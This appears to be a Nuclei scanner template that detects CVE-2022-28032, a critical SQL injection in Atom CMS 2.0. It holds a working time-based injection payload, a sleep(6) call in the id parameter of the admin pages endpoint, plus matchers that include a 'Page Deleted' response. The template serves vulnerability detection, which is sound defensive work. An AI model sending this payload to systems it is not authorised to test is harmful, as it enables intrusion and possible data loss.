44 lines
1.2 KiB
YAML
44 lines
1.2 KiB
YAML
id: CVE-2022-28032
|
|
|
|
info:
|
|
name: Atom CMS v2.0 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php
|
|
remediation: Fixed in version Atom CMS v2.1
|
|
reference:
|
|
- https://github.com/thedigicraft/Atom.CMS/issues/263
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-28032
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-28032
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01192
|
|
epss-percentile: 0.83514
|
|
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: thedigitalcraft
|
|
product: atomcms
|
|
tags: cve,cve2022,sqli,atom,cms
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(body, "Page Deleted")'
|
|
condition: and
|
|
|
|
# digest: 4a0a004730450221008fcbde76cf92c338200d30d983aa0ce46576b7fca9f16a2a7ac6c561a2ba690c022063c512f7e245fc1beb3c8c66979ae0aacd60004a579270ad04cab7b9984bffa0:922c64590222798bb761d5b6d8e72950
|